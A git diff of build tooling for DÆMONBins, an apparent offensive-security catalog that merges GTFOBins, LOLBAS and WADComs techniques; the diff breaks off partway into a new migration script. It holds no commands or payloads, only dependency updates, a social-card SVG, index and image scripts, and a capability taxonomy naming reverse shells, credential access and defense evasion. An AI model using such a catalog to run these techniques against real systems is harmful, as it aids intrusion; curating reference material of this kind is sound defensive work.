"https://registry.npmjs.org/vscode-jsonrpc/-/vscode-jsonrpc-9.0.2.tgz", + "integrity": "sha512-SbQSV9yRemARxeXw6LU5sS6Zq0e9/DgCCX5yelH263ZQWukbTk8EF8fjTrr1dziasf4GwlJbvTwFnTrnQFWZXQ==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/vscode-languageserver": { + "version": "9.0.1", + "resolved": "https://registry.npmjs.org/vscode-languageserver/-/vscode-languageserver-9.0.1.tgz", + "integrity": "sha512-woByF3PDpkHFUreUa7Hos7+pUWdeWMXRd26+ZX2A8cFx6v/JPTtd4/uN0/jB6XQHYaOlHbio03NTHCqrgG5n7g==", + "dev": true, + "license": "MIT", + "dependencies": { + "vscode-languageserver-protocol": "3.17.5" + }, + "bin": { + "installServerIntoExtension": "bin/installServerIntoExtension" + } + }, + "node_modules/vscode-languageserver-protocol": { + "version": "3.18.3", + "resolved": "https://registry.npmjs.org/vscode-languageserver-protocol/-/vscode-languageserver-protocol-3.18.3.tgz", + "integrity": "sha512-DF49+WeV5py4zO5hhobp60jjsDSK0lAqA0OuKBLBvp423HPWQcCbhZz3JgyfIewsEz2f8U+X75xNIFHdiXZm2w==", + "dev": true, + "license": "MIT", + "dependencies": { + "vscode-jsonrpc": "9.0.2", + "vscode-languageserver-types": "3.18.3" + } + }, + "node_modules/vscode-languageserver-textdocument": { + "version": "1.0.14", + "resolved": "https://registry.npmjs.org/vscode-languageserver-textdocument/-/vscode-languageserver-textdocument-1.0.14.tgz", + "integrity": "sha512-EQyqJMi552E4ZTf46izQ4Fj6XquqxCySR3J5ZSD1SisMf6RfpeOWHxGBE8Gr6V0/3GHIGdAzDn8F8+1nTGCnoQ==", + "dev": true, + "license": "MIT" + }, + "node_modules/vscode-languageserver-types": { + "version": "3.18.3", + "resolved": "https://registry.npmjs.org/vscode-languageserver-types/-/vscode-languageserver-types-3.18.3.tgz", + "integrity": "sha512-XIlzJ7Qp/jzSI1ds7/FwPAWrPeTZA7pAtlW4hdJ1J6xXWJL6dR9QYnDhJOdLzdKhUQ5Mm6mvUMw+3DcOQQasPw==", + "dev": true, + "license": "MIT" + }, + "node_modules/vscode-languageserver/node_modules/vscode-jsonrpc": { + "version": "8.2.0", + "resolved": "https://registry.npmjs.org/vscode-jsonrpc/-/vscode-jsonrpc-8.2.0.tgz", + "integrity": "sha512-C+r0eKJUIfiDIfwJhria30+TYWPtuHJXHtI7J0YlOmKAo7ogxP20T0zxB7HZQIFhIyvoBPwWskjxrvAtfjyZfA==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/vscode-languageserver/node_modules/vscode-languageserver-protocol": { + "version": "3.17.5", + "resolved": "https://registry.npmjs.org/vscode-languageserver-protocol/-/vscode-languageserver-protocol-3.17.5.tgz", + "integrity": "sha512-mb1bvRJN8SVznADSGWM9u/b07H7Ecg0I3OgXDuLdn307rl/J3A9YD6/eYOssqhecL27hK1IPZAsaqh00i/Jljg==", + "dev": true, + "license": "MIT", + "dependencies": { + "vscode-jsonrpc": "8.2.0", + "vscode-languageserver-types": "3.17.5" + } + }, + "node_modules/vscode-languageserver/node_modules/vscode-languageserver-types": { + "version": "3.17.5", + "resolved": "https://registry.npmjs.org/vscode-languageserver-types/-/vscode-languageserver-types-3.17.5.tgz", + "integrity": "sha512-Ld1VelNuX9pdF39h2Hgaeb5hEZM2Z3jUrrMgWQAu82jMtZp7p3vJT3BzToKtZI7NgQssZje5o0zryOrhQvzQAg==", + "dev": true, + "license": "MIT" + }, + "node_modules/vscode-nls": { + "version": "5.2.0", + "resolved": "https://registry.npmjs.org/vscode-nls/-/vscode-nls-5.2.0.tgz", + "integrity": "sha512-RAaHx7B14ZU04EU31pT+rKz2/zSl7xMsfIZuo8pd+KZO6PXtQmpevpq3vxvWNcrGbdmhM/rr5Uw5Mz+NBfhVng==", + "dev": true, + "license": "MIT" + }, + "node_modules/vscode-uri": { + "version": "3.2.0", + "resolved": "https://registry.npmjs.org/vscode-uri/-/vscode-uri-3.2.0.tgz", + "integrity": "sha512-m2gXo3bn0G1kT9InzMf07fTbqMbGtyckj3bH5ktLO+1Ssv+yiATZ4dhwaQv9UZWxJh6E9IFGnQyjgWVDWVBDrg==", + "dev": true, + "license": "MIT" + }, "node_modules/web-namespaces": { "version": "2.0.1", "resolved": "https://registry.npmjs.org/web-namespaces/-/web-namespaces-2.0.1.tgz", @@ -7015,6 +7776,97 @@ "integrity": "sha512-147y/6YNh+tlp6nd/2pWq38i9h6mz/EuQ6njIrmW8D1BS5nCqs0P6DG+m6zTGnNz5I+uhZ0SHxBs9BsPrwcKDA==", "license": "MIT" }, + "node_modules/y18n": { + "version": "5.0.8", + "resolved": "https://registry.npmjs.org/y18n/-/y18n-5.0.8.tgz", + "integrity": "sha512-0pfFzegeDWJHJIAmTLRP2DwHjdF5s7jo9tuztdQxAhINCdvS+3nGINqPd00AphqJR/0LhANUS6/+7SCb98YOfA==", + "dev": true, + "license": "ISC", + "engines": { + "node": ">=10" + } + }, + "node_modules/yaml": { + "version": "2.9.0", + "resolved": "https://registry.npmjs.org/yaml/-/yaml-2.9.0.tgz", + "integrity": "sha512-2AvhNX3mb8zd6Zy7INTtSpl1F15HW6Wnqj0srWlkKLcpYl/gMIMJiyuGq2KeI2YFxUPjdlB+3Lc10seMLtL4cA==", + "devOptional": true, + "license": "ISC", + "bin": { + "yaml": "bin.mjs" + }, + "engines": { + "node": ">= 14.6" + }, + "funding": { + "url": "https://github.com/sponsors/eemeli" + } + }, + "node_modules/yaml-language-server": { + "version": "1.23.0", + "resolved": "https://registry.npmjs.org/yaml-language-server/-/yaml-language-server-1.23.0.tgz", + "integrity": "sha512-3qVyCOexLCWw06PQa5kRPwvMWMZ/eZeCRWUvgD6a0OkqL/4iCnxy2WumbWifa937Uo5xhyWJ0uxlU39ljhNh7A==", + "dev": true, + "license": "MIT", + "dependencies": { + "@vscode/l10n": "^0.0.18", + "ajv": "^8.17.1", + "ajv-draft-04": "^1.0.0", + "ajv-i18n": "^4.2.0", + "prettier": "^3.8.1", + "request-light": "^0.5.7", + "vscode-json-languageservice": "4.1.8", + "vscode-languageserver": "^9.0.0", + "vscode-languageserver-textdocument": "^1.0.1", + "vscode-languageserver-types": "^3.16.0", + "vscode-uri": "^3.0.2", + "yaml": "2.8.3" + }, + "bin": { + "yaml-language-server": "bin/yaml-language-server" + } + }, + "node_modules/yaml-language-server/node_modules/request-light": { + "version": "0.5.8", + "resolved": "https://registry.npmjs.org/request-light/-/request-light-0.5.8.tgz", + "integrity": "sha512-3Zjgh+8b5fhRJBQZoy+zbVKpAQGLyka0MPgW3zruTF4dFFJ8Fqcfu9YsAvi/rvdcaTeWG3MkbZv4WKxAn/84Lg==", + "dev": true, + "license": "MIT" + }, + "node_modules/yaml-language-server/node_modules/yaml": { + "version": "2.8.3", + "resolved": "https://registry.npmjs.org/yaml/-/yaml-2.8.3.tgz", + "integrity": "sha512-AvbaCLOO2Otw/lW5bmh9d/WEdcDFdQp2Z2ZUH3pX9U2ihyUY0nvLv7J6TrWowklRGPYbB/IuIMfYgxaCPg5Bpg==", + "dev": true, + "license": "ISC", + "bin": { + "yaml": "bin.mjs" + }, + "engines": { + "node": ">= 14.6" + }, + "funding": { + "url": "https://github.com/sponsors/eemeli" + } + }, + "node_modules/yargs": { + "version": "18.1.0", + "resolved": "https://registry.npmjs.org/yargs/-/yargs-18.1.0.tgz", + "integrity": "sha512-2rAgRKu54VsHkqI0/tYkmluGXHD4KW7yZoycuqDQ15QOTnc2VVfy0nN/1eMhnQLO00A+dwtK20xuCnc1YGeUyg==", + "dev": true, + "license": "MIT", + "dependencies": { + "cliui": "^9.0.1", + "escalade": "^3.1.1", + "get-caller-file": "^2.0.5", + "string-width": "^8.2.1", + "y18n": "^5.0.5", + "yargs-parser": "^22.0.0" + }, + "engines": { + "node": "^20.19.0 || ^22.12.0 || >=23" + } + }, "node_modules/yargs-parser": { "version": "21.1.1", "resolved": "https://registry.npmjs.org/yargs-parser/-/yargs-parser-21.1.1.tgz", @@ -7024,6 +7876,33 @@ "node": ">=12" } }, + "node_modules/yargs/node_modules/string-width": { + "version": "8.2.2", + "resolved": "https://registry.npmjs.org/string-width/-/string-width-8.2.2.tgz", + "integrity": "sha512-GaPUh5gfdrYzqeVNZvUfT23vYYxXzKYidUcnMtJg/3rxRV63EFZy3k6xfKlmfeJD0176lnUV/Usr3XcwSvFzpg==", + "dev": true, + "license": "MIT", + "dependencies": { + "get-east-asian-width": "^1.5.0", + "strip-ansi": "^7.1.2" + }, + "engines": { + "node": ">=20" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/yargs/node_modules/yargs-parser": { + "version": "22.0.0", + "resolved": "https://registry.npmjs.org/yargs-parser/-/yargs-parser-22.0.0.tgz", + "integrity": "sha512-rwu/ClNdSMpkSrUb+d6BRsSkLUq1fmfsY6TOpYzTwvwkg1/NRG85KBy3kq++A8LKQwX6lsu+aWad+2khvuXrqw==", + "dev": true, + "license": "ISC", + "engines": { + "node": "^20.19.0 || ^22.12.0 || >=23" + } + }, "node_modules/yocto-queue": { "version": "1.2.2", "resolved": "https://registry.npmjs.org/yocto-queue/-/yocto-queue-1.2.2.tgz", diff --git a/package.json b/package.json @@ -5,12 +5,19 @@ "private": true, "description": "DÆMONBins — the Off-the-Land Almanac: a merged, filterable GTFOBins × LOLBAS × WADComs catalog.", "license": "GPL-3.0-or-later", + "engines": { + "node": ">=22" + }, "scripts": { - "dev": "npm run data:public && astro dev", + "dev": "npm run build:index && npm run data:public && astro dev", "data": "node scripts/build-dataset.mjs", "data:public": "node -e \"const fs=require('fs');fs.mkdirSync('public/data',{recursive:true});fs.copyFileSync('src/data/techniques.json','public/data/techniques.json')\"", - "build": "npm run data:public && astro build && pagefind --site dist && npm run pagefind:public", - "test": "node --test", + "build:index": "node scripts/build-index.mjs", + "og": "node scripts/og.mjs", + "validate:data": "node scripts/validate-data.mjs", + "check": "astro check", + "test": "node --test \"test/**/*.test.mjs\"", + "build": "npm run build:index && npm run data:public && astro build && pagefind --site dist && npm run pagefind:public", "preview": "astro preview", "pagefind:public": "rm -rf public/pagefind && cp -R dist/pagefind public/pagefind", "astro": "astro" @@ -22,6 +29,7 @@ "sharp": "^0.35.4" }, "devDependencies": { + "@astrojs/check": "^0.9.10", "esbuild": "^0.25.0", "github-slugger": "^2.0.0", "js-yaml": "^4.1.0", diff --git a/public/og.png b/public/og.png Binary files differ. diff --git a/public/og.svg b/public/og.svg @@ -1,30 +1,47 @@ <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1200 630" width="1200" height="630"> <defs> - <linearGradient id="bg" x1="0" y1="0" x2="1" y2="1"> + <pattern id="grid" width="40" height="40" patternUnits="userSpaceOnUse"> + <path d="M40 0H0V40" fill="none" stroke="#e0def4" stroke-opacity="0.045" stroke-width="1"/> + </pattern> + <linearGradient id="wash" x1="0" y1="0" x2="1" y2="1"> <stop offset="0" stop-color="#191724"/> <stop offset="1" stop-color="#1f1d2e"/> </linearGradient> - <linearGradient id="ac" x1="0" y1="0" x2="1" y2="0"> - <stop offset="0" stop-color="#9ccfd8"/> - <stop offset="1" stop-color="#c4a7e7"/> - </linearGradient> - <pattern id="grid" width="40" height="40" patternUnits="userSpaceOnUse"> - <path d="M40 0H0V40" fill="none" stroke="#e0def4" stroke-opacity="0.05" stroke-width="1"/> - </pattern> </defs> - <rect width="1200" height="630" fill="url(#bg)"/> + <rect width="1200" height="630" fill="url(#wash)"/> <rect width="1200" height="630" fill="url(#grid)"/> - <circle cx="120" cy="90" r="260" fill="#c4a7e7" fill-opacity="0.12"/> - <circle cx="1080" cy="70" r="240" fill="#9ccfd8" fill-opacity="0.10"/> - <g font-family="'JetBrains Mono', monospace"> - <text x="90" y="150" fill="#6e6a86" font-size="26" letter-spacing="6">// CURATED OFFENSIVE-SECURITY REFERENCE</text> + <!-- signal bands: the site's streak field, frozen --> + <g opacity="0.55"> + <rect x="0" y="86" width="1200" height="2" fill="#c4a7e7" opacity="0.35"/> + <rect x="180" y="118" width="760" height="1" fill="#9ccfd8" opacity="0.5"/> + <rect x="0" y="540" width="1200" height="1" fill="#eb6f92" opacity="0.35"/> + <rect x="420" y="566" width="780" height="2" fill="#f6c177" opacity="0.3"/> + </g> + <!-- masthead --> + <g font-family="'DM Mono', 'JetBrains Mono', 'Liberation Mono', monospace" font-size="22" fill="#908caa" letter-spacing="4"> + <text x="80" y="150">^: 00 · LIVING OFF THE LAND</text> + <text x="1120" y="150" text-anchor="end">lotl.daemon-sec.xyz</text> </g> - <g font-family="'Chakra Petch','Segoe UI',sans-serif" font-weight="700"> - <text x="86" y="330" fill="#e0def4" font-size="128" letter-spacing="-2">DÆMON<tspan fill="#c4a7e7">//</tspan>SEC</text> + <!-- title --> + <g font-family="'Noto Sans Display', 'Archivo', 'Liberation Sans', sans-serif" font-weight="700"> + <text x="76" y="300" fill="#e0def4" font-weight="800" font-size="150" letter-spacing="-7">D<tspan fill="#eb6f92">Æ</tspan>MONBins</text> </g> - <text x="90" y="420" fill="#908caa" font-family="'Inter',sans-serif" font-size="40">The cheatsheet vault for operators.</text> - <rect x="90" y="470" width="1020" height="4" rx="2" fill="url(#ac)"/> - <g font-family="'JetBrains Mono', monospace" font-size="30" fill="#9ccfd8"> - <text x="90" y="545">AD · Enumeration · Exploitation · Priv-Esc · Web · DFIR · Tools</text> + <text x="80" y="368" fill="#908caa" font-family="'Noto Sans Display', 'Archivo', 'Liberation Sans', sans-serif" font-weight="600" font-size="44" letter-spacing="-1">the Off-the-Land Almanac</text> + <text x="1120" y="366" text-anchor="end" fill="#e0def4" font-family="'DM Mono', 'JetBrains Mono', 'Liberation Mono', monospace" font-size="26" letter-spacing="1">2,885 techniques · 842 tools</text> + <text x="80" y="420" fill="#6e6a86" font-family="'DM Mono', 'JetBrains Mono', 'Liberation Mono', monospace" font-size="22" letter-spacing="0.5">GTFOBins × LOLBAS × WADComs — merged, resynced, extended · MITRE ATT&amp;CK mapped</text> + <!-- the four decks --> + <g font-family="'DM Mono', 'JetBrains Mono', 'Liberation Mono', monospace"> + <rect x="80" y="470" width="236" height="4" fill="#9ccfd8"/> + <text x="80" y="522" fill="#e0def4" font-family="'Noto Sans Display', 'Archivo', 'Liberation Sans', sans-serif" font-weight="700" font-size="46" letter-spacing="-2">2,125</text> + <text x="80" y="556" fill="#9ccfd8" font-size="20" letter-spacing="3">GTFOBINS</text> + <rect x="342" y="470" width="236" height="4" fill="#c4a7e7"/> + <text x="342" y="522" fill="#e0def4" font-family="'Noto Sans Display', 'Archivo', 'Liberation Sans', sans-serif" font-weight="700" font-size="46" letter-spacing="-2">481</text> + <text x="342" y="556" fill="#c4a7e7" font-size="20" letter-spacing="3">LOLBAS</text> + <rect x="604" y="470" width="236" height="4" fill="#f6c177"/> + <text x="604" y="522" fill="#e0def4" font-family="'Noto Sans Display', 'Archivo', 'Liberation Sans', sans-serif" font-weight="700" font-size="46" letter-spacing="-2">100</text> + <text x="604" y="556" fill="#f6c177" font-size="20" letter-spacing="3">WADCOMS</text> + <rect x="866" y="470" width="236" height="4" fill="#eb6f92"/> + <text x="866" y="522" fill="#e0def4" font-family="'Noto Sans Display', 'Archivo', 'Liberation Sans', sans-serif" font-weight="700" font-size="46" letter-spacing="-2">179</text> + <text x="866" y="556" fill="#eb6f92" font-size="20" letter-spacing="3">DÆMON</text> </g> </svg> diff --git a/scripts/build-dataset.mjs b/scripts/build-dataset.mjs @@ -21,7 +21,8 @@ import { fileURLToPath } from 'node:url'; import { dirname, join, resolve } from 'node:path'; import yaml from 'js-yaml'; import esbuild from 'esbuild'; -import { z } from 'zod'; +import { impacketScript, canonicalizeFamilyCase } from './wadcoms-normalize.mjs'; +import { PLATFORMS, SOURCES, CAPABILITIES, validateTechniques } from './technique-schema.mjs'; const __dirname = dirname(fileURLToPath(import.meta.url)); const ROOT = resolve(__dirname, '..'); @@ -36,16 +37,8 @@ const BACKLOG_JSON = join(OUT_SRC, 'daemon-backlog.json'); // --------------------------------------------------------------------------- // Unified vocabulary // --------------------------------------------------------------------------- -const PLATFORMS = ['Linux', 'Windows', 'macOS', 'ActiveDirectory']; -const SOURCES = ['GTFOBins', 'LOLBAS', 'WADComs', 'DAEMON']; -const CAPABILITIES = [ - 'Execution', 'Reverse/Bind Shell', - 'File Download', 'File Upload', 'File Read', 'File Write', 'File Copy', - 'Library Load', 'Compile', - 'Privilege Escalation', 'UAC Bypass', 'AWL / Policy Bypass', - 'Defense Evasion', 'Credential Access', - 'Discovery', 'Persistence', 'Lateral Movement', 'Collection', -]; +// PLATFORMS / SOURCES / CAPABILITIES + TechniqueSchema live in technique-schema.mjs +// (shared with validate-data.mjs and the one-shot migrations). // GTFOBins function → capability (BUILD-PROMPT §5) const GTFO_FN_CAP = { @@ -174,33 +167,6 @@ function normPrivilege(raw) { const lolbasUrlType = { OSBinaries: 'Binaries', OSLibraries: 'Libraries', OSScripts: 'Scripts', OtherMSBinaries: 'OtherMSBinaries' }; const lolbasType = { OSBinaries: 'Binary', OSLibraries: 'Library', OSScripts: 'Script', OtherMSBinaries: 'OtherMSBinary' }; -// --------------------------------------------------------------------------- -// Zod schema — every emitted Technique is validated; a bad record fails the build. -// --------------------------------------------------------------------------- -const TechniqueSchema = z.object({ - id: z.string().min(1), - toolId: z.string().min(1), - toolName: z.string().min(1), - name: z.string().optional(), - source: z.enum(['GTFOBins', 'LOLBAS', 'WADComs', 'DAEMON']), - platform: z.array(z.enum(['Linux', 'Windows', 'macOS', 'ActiveDirectory'])).min(1), - capability: z.array(z.enum(CAPABILITIES)), - nativeCategory: z.array(z.string()), - command: z.string().min(1), - description: z.string().optional(), - usecase: z.string().optional(), - mitre: z.array(z.string()), - privilege: z.string().optional(), - context: z.string().optional(), - requires: z.array(z.string()).optional(), - services: z.array(z.string()).optional(), - fullPath: z.array(z.string()).optional(), - toolType: z.string().optional(), - detection: z.array(z.object({ type: z.string(), value: z.string() })).optional(), - references: z.array(z.string()), - added: z.boolean().optional(), - verifyNote: z.string().optional(), -}); // --------------------------------------------------------------------------- // GTFOBins @@ -384,10 +350,19 @@ function wadTechnique(entry, source) { const capability = uniq(attackTypes.flatMap((a) => WAD_ATTACK_CAP[a] || [])); const slug = entry.slug; const family = String(slug).split('-')[0] || slug; + // Impacket is a *suite* of independent example scripts, not one tool — file + // each technique under its own `examples/<script>.py` so the ~48 Impacket + // techniques split into per-script pages instead of collapsing onto one. + let toolId = `wadcoms:${family}`; + let toolName = family; + if (family === 'Impacket') { + const script = impacketScript(references, entry.command); + if (script) { toolId = `wadcoms:Impacket-${script}`; toolName = `Impacket-${script}`; } + } return { id: `wadcoms:${slug}`, - toolId: `wadcoms:${family}`, - toolName: family, + toolId, + toolName, name: entry.name || slug, source, platform: wadPlatform(os, services, items), @@ -511,27 +486,20 @@ async function main() { const backlog = ingestBacklog(); console.log(` DÆMON §7 : ${backlog.techniques.length} techniques (modernization backlog)`); + // Fold case-duplicate WADComs families (e.g. Enum4Linux / enum4linux) onto + // one canonical page so the static router never silently drops a tool. + const wadTechs = canonicalizeFamilyCase([...wadUp, ...wadAdd]); const techniques = [ - ...gtfo.techniques, ...lolbas.techniques, ...wadUp, ...wadAdd, ...backlog.techniques, + ...gtfo.techniques, ...lolbas.techniques, ...wadTechs, ...backlog.techniques, ]; - const wadTools = toolsFromWad([...wadUp, ...wadAdd]); + const wadTools = toolsFromWad(wadTechs); const tools = [...gtfo.tools, ...lolbas.tools, ...wadTools, ...backlog.tools]; - // Validate every record; fail the build on the first bad one. - let bad = 0; - const ids = new Set(); - for (const t of techniques) { - const r = TechniqueSchema.safeParse(t); - if (!r.success) { - bad++; - if (bad <= 10) console.error(` ✗ invalid ${t.id}: ${r.error.issues.map((i) => `${i.path.join('.')} ${i.message}`).join('; ')}`); - continue; - } - if (ids.has(t.id)) { bad++; console.error(` ✗ duplicate id ${t.id}`); } - ids.add(t.id); - } - if (bad > 0) { - console.error(`\nBUILD FAILED: ${bad} invalid/duplicate technique record(s).`); + // Validate every record (schema + unique ids); fail the build on any bad one. + const problems = validateTechniques(techniques); + if (problems.length) { + for (const p of problems.slice(0, 10)) console.error(` ✗ ${p}`); + console.error(`\nBUILD FAILED: ${problems.length} invalid/duplicate technique record(s).`); process.exit(1); } diff --git a/scripts/build-index.mjs b/scripts/build-index.mjs @@ -0,0 +1,55 @@ +/** + * `npm run build:index` — project the committed dataset down to the fields the + * catalog list needs and write it as a content-addressed file: + * + * public/data/index-<sha256[0:8]>.json fetched by the catalog island + * src/data/index-hash.json { file, hash, bytes, count } — imported + * by catalog.astro to point at the file + * + * The hashed name lets vercel.json serve it `immutable`; a data change makes a + * new name, so a stale cache is impossible. Runs at the head of `npm run build` + * and `npm run dev`; validate-data.mjs fails if index-hash.json is stale. + */ +import { readFileSync, writeFileSync, mkdirSync, readdirSync, unlinkSync, existsSync } from 'node:fs'; +import { createHash } from 'node:crypto'; +import { fileURLToPath } from 'node:url'; +import { dirname, join, resolve } from 'node:path'; + +const ROOT = resolve(dirname(fileURLToPath(import.meta.url)), '..'); + +/** Mirror of LIST_FIELDS in src/lib/render-row.ts (test/build-index.test.mjs pins them). */ +export const LIST_FIELDS = [ + 'id', 'toolId', 'toolName', 'name', 'source', 'platform', 'capability', 'nativeCategory', + 'command', 'description', 'usecase', 'mitre', 'privilege', 'added', +]; + +export function project(t) { + const out = {}; + for (const k of LIST_FIELDS) if (t[k] !== undefined) out[k] = t[k]; + return out; +} + +/** Deterministic: same techniques → same bytes → same hash. */ +export function buildIndex(techniques) { + const list = techniques.map(project); + const json = JSON.stringify(list); + const hash = createHash('sha256').update(json).digest('hex').slice(0, 8); + return { json, hash, file: `index-${hash}.json`, bytes: Buffer.byteLength(json), count: list.length }; +} + +export function main() { + const techniques = JSON.parse(readFileSync(join(ROOT, 'src/data/techniques.json'), 'utf8')); + const idx = buildIndex(techniques); + const pub = join(ROOT, 'public', 'data'); + mkdirSync(pub, { recursive: true }); + for (const f of readdirSync(pub)) if (/^index-[0-9a-f]{8}\.json$/.test(f) && f !== idx.file) unlinkSync(join(pub, f)); + writeFileSync(join(pub, idx.file), idx.json); + const meta = { file: idx.file, hash: idx.hash, bytes: idx.bytes, count: idx.count }; + const metaPath = join(ROOT, 'src/data/index-hash.json'); + const prev = existsSync(metaPath) ? readFileSync(metaPath, 'utf8') : ''; + const next = JSON.stringify(meta, null, 2) + '\n'; + if (prev !== next) writeFileSync(metaPath, next); + console.log(`build:index — public/data/${idx.file}: ${idx.count} rows, ${idx.bytes.toLocaleString('en-US')} B${prev !== next ? ' (index-hash.json updated)' : ''}`); +} + +if (process.argv[1] && resolve(process.argv[1]) === fileURLToPath(import.meta.url)) main(); diff --git a/scripts/og.mjs b/scripts/og.mjs @@ -0,0 +1,137 @@ +/** + * Social card — `npm run og`. + * + * Renders public/og.png (1200×630) from the SVG template below, using the + * site's own faces from src/fonts via a private fontconfig so the card is the + * site (Archivo display, DM Mono labels) rather than whatever the build box + * happens to have installed. The PNG is committed and served as a static + * asset — it is NOT rendered at build time on purpose: Vercel's image has + * different fonts, and a card that changes shape per environment is worse + * than one that changes only when someone re-runs this. + * + * Re-run after the dataset changes so the counts on the card stay honest. + */ +import { mkdirSync, writeFileSync, readFileSync, readdirSync, existsSync } from 'node:fs'; +import { spawnSync } from 'node:child_process'; +import { fileURLToPath } from 'node:url'; +import { dirname, join, resolve } from 'node:path'; +import { tmpdir } from 'node:os'; + +const ROOT = resolve(dirname(fileURLToPath(import.meta.url)), '..'); +const FONTS = join(ROOT, 'src', 'fonts'); +const facets = JSON.parse(readFileSync(join(ROOT, 'src/data/facets.json'), 'utf8')); +const c = facets.counts; +const n = (x) => Number(x || 0).toLocaleString('en-US'); + +// A private fontconfig that sees only the site's faces. sharp's bundled +// FreeType registers WOFF2 (fc-list sees them) but cannot rasterise their +// glyphs — every run came out as tofu — so decompress to TTF first. Needs +// `woff2_decompress` (package "woff2") or fonttools+brotli on PATH; both are +// tried. Must be in place before sharp (libvips → pango → fontconfig) loads. +const fcDir = join(tmpdir(), 'daemonbins-og-fc'); +const ttfDir = join(fcDir, 'ttf'); +mkdirSync(join(fcDir, 'cache'), { recursive: true }); +mkdirSync(ttfDir, { recursive: true }); +function decompress(woff2, ttf) { + let r = spawnSync('woff2_decompress', [woff2], { stdio: 'ignore' }); + if (r.status === 0) { + // woff2_decompress writes <name>.ttf beside the input; move it. + const beside = woff2.replace(/\.woff2$/, '.ttf'); + if (existsSync(beside)) { writeFileSync(ttf, readFileSync(beside)); spawnSync('rm', ['-f', beside]); return true; } + } + r = spawnSync('fonttools', ['ttLib.woff2', 'decompress', '-o', ttf, woff2], { stdio: 'ignore' }); + return r.status === 0 && existsSync(ttf); +} +let converted = 0; +for (const f of readdirSync(FONTS).filter((f) => f.endsWith('.woff2'))) { + const ttf = join(ttfDir, f.replace(/\.woff2$/, '.ttf')); + if (existsSync(ttf) || decompress(join(FONTS, f), ttf)) converted++; +} +if (!converted) { + console.error('og: could not decompress any WOFF2 → TTF. Install "woff2" (woff2_decompress) or fonttools + brotli.'); + process.exit(1); +} +writeFileSync(join(fcDir, 'fonts.conf'), `<?xml version="1.0"?> +<!DOCTYPE fontconfig SYSTEM "fonts.dtd"> +<fontconfig> + <dir>${ttfDir}</dir> + <cachedir>${join(fcDir, 'cache')}</cachedir> +</fontconfig> +`); +process.env.FONTCONFIG_FILE = join(fcDir, 'fonts.conf'); +const sharp = (await import('sharp')).default; + +// Rosé Pine (night) — the card is always the dark plate, like the code blocks. +const P = { + base: '#191724', surface: '#1f1d2e', overlay: '#26233a', + text: '#e0def4', subtle: '#908caa', muted: '#6e6a86', + love: '#eb6f92', gold: '#f6c177', iris: '#c4a7e7', foam: '#9ccfd8', pine: '#3e8fb0', +}; +// Noto Sans Display is the masthead wordmark face (tokens.css --font-wordmark); +// the Archivo subsets do not survive the WOFF2→TTF trip, so the card uses the +// wordmark face for all display text. +const DISPLAY = "'Noto Sans Display', 'Archivo', 'Liberation Sans', sans-serif"; +const MONO = "'DM Mono', 'JetBrains Mono', 'Liberation Mono', monospace"; + +const decks = [ + { tag: 'GTFOBins', acc: P.foam, n: c.bySource?.GTFOBins }, + { tag: 'LOLBAS', acc: P.iris, n: c.bySource?.LOLBAS }, + { tag: 'WADComs', acc: P.gold, n: c.bySource?.WADComs }, + { tag: 'DÆMON', acc: P.love, n: c.bySource?.DAEMON }, +]; + +const svg = `<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1200 630" width="1200" height="630"> + <defs> + <pattern id="grid" width="40" height="40" patternUnits="userSpaceOnUse"> + <path d="M40 0H0V40" fill="none" stroke="${P.text}" stroke-opacity="0.045" stroke-width="1"/> + </pattern> + <linearGradient id="wash" x1="0" y1="0" x2="1" y2="1"> + <stop offset="0" stop-color="${P.base}"/> + <stop offset="1" stop-color="${P.surface}"/> + </linearGradient> + </defs> + <rect width="1200" height="630" fill="url(#wash)"/> + <rect width="1200" height="630" fill="url(#grid)"/> + <!-- signal bands: the site's streak field, frozen --> + <g opacity="0.55"> + <rect x="0" y="86" width="1200" height="2" fill="${P.iris}" opacity="0.35"/> + <rect x="180" y="118" width="760" height="1" fill="${P.foam}" opacity="0.5"/> + <rect x="0" y="540" width="1200" height="1" fill="${P.love}" opacity="0.35"/> + <rect x="420" y="566" width="780" height="2" fill="${P.gold}" opacity="0.3"/> + </g> + <!-- masthead --> + <g font-family="${MONO}" font-size="22" fill="${P.subtle}" letter-spacing="4"> + <text x="80" y="150">^: 00 · LIVING OFF THE LAND</text> + <text x="1120" y="150" text-anchor="end">lotl.daemon-sec.xyz</text> + </g> + <!-- title --> + <g font-family="${DISPLAY}" font-weight="700"> + <text x="76" y="300" fill="${P.text}" font-weight="800" font-size="150" letter-spacing="-7">D<tspan fill="${P.love}">Æ</tspan>MONBins</text> + </g> + <text x="80" y="368" fill="${P.subtle}" font-family="${DISPLAY}" font-weight="600" font-size="44" letter-spacing="-1">the Off-the-Land Almanac</text> + <text x="1120" y="366" text-anchor="end" fill="${P.text}" font-family="${MONO}" font-size="26" letter-spacing="1">${n(c.techniques)} techniques · ${n(c.tools)} tools</text> + <text x="80" y="420" fill="${P.muted}" font-family="${MONO}" font-size="22" letter-spacing="0.5">GTFOBins × LOLBAS × WADComs — merged, resynced, extended · MITRE ATT&amp;CK mapped</text> + <!-- the four decks --> + <g font-family="${MONO}"> + ${decks.map((d, i) => { + const x = 80 + i * 262; + return `<rect x="${x}" y="470" width="236" height="4" fill="${d.acc}"/> + <text x="${x}" y="522" fill="${P.text}" font-family="${DISPLAY}" font-weight="700" font-size="46" letter-spacing="-2">${n(d.n)}</text> + <text x="${x}" y="556" fill="${d.acc}" font-size="20" letter-spacing="3">${d.tag.toUpperCase()}</text>`; + }).join('\n ')} + </g> +</svg> +`; + +const outSvg = join(ROOT, 'public', 'og.svg'); +const outPng = join(ROOT, 'public', 'og.png'); +writeFileSync(outSvg, svg); +// librsvg maps the SVG's px to 72 dpi; rasterise at 2× and downsample to the +// exact 1200×630 so type edges stay crisp on retina previews. +const png = await sharp(Buffer.from(svg), { density: 144 }) + .resize(1200, 630, { fit: 'fill', kernel: 'lanczos3' }) + .png({ compressionLevel: 9, palette: false }) + .toBuffer(); +writeFileSync(outPng, png); +const meta = await sharp(png).metadata(); +console.log(`wrote public/og.svg (${svg.length} B) and public/og.png (${png.length} B, ${meta.width}×${meta.height})`); diff --git a/scripts/split-impacket.mjs b/scripts/split-impacket.mjs @@ -0,0 +1,117 @@ +/** + * One-time, idempotent migration of the committed dataset: + * + * 